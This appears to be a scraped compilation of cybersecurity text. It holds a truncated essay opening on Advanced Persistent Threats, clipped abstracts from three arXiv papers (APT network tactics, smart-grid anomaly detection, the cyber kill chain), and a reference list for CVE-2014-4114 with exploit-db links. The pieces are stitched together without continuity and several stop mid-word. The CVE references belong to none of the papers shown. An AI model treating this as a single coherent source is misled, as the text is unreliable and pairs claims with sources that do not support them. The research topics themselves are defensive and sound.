The techniques used in modern attacks have become an important factor for investigation. As we advance further into the digital age, cyber attackers are employing increasingly sophisticated and highly threatening methods. These attacks target not only organizations and governments but also extend to private and corporate sectors. Modern attack techniques, such as lateral movement and ransomware, are designed to infiltrate networks and steal sensitive data. Among these techniques, Advanced Persistent Threats (APTs) represent a complex method of attack aimed at specific targets to steal high-value sensitive information or damage the infrastructure of the targeted organization.
In this paper, I will investigate Advanced Persistent Threats (APTs) as a modern attack technique, focu
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Detecting Anomalies using Overlapping Electrical Measurements in Smart Power Grids
arxiv_fulltext·2022-01-06
Detecting Anomalies using Overlapping Electrical Measurements in Smart Power Grids
Sina Sontowski and Maanak Gupta
Dept. of Computer Science, Tennessee Technological University, Cookeville, Tennessee, USA
Nigel Lawrence and Deepjyoti Deka
Los Alamos National Laboratory, Los Alamos, New Mexico, USA
## Abstract
As cyber-attacks against critical infrastructure become more frequent, it is increasingly important to be able to rapidly identify and respond to these threats.
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Technical Aspects of Cyber Kill Chain
Tarun Yadav
Scientist, Defence Research and Organisation, INDIA
Rao Arvind Mallari
Scientist, Defence Research and Organisation, INDIA
## Abstract
Recent trends in targeted cyber-attacks have increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. The cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. The cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categorizes the methodologies, techniques and tools involv
References
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/
- http://blogs.technet.com/b/srd/archive/2014/10/14/accessing-risk-for-the-october-2014-security-updates.aspx
- http://osvdb.org/show/osvdb/113140
- http://secunia.com/advisories/60972
- http://www.exploit-db.com/exploits/35019
- http://www.exploit-db.com/exploits/35020
- http://www.exploit-db.com/exploits/35055
- http://www.isightpartners.com/2014/10/cve-2014-4114/
- http://www.securityfocus.com/bid/70419
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-060
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-4114
Published: 2014-10-15
Added to CISA KEV: 2022-03-03
Exploited in the wild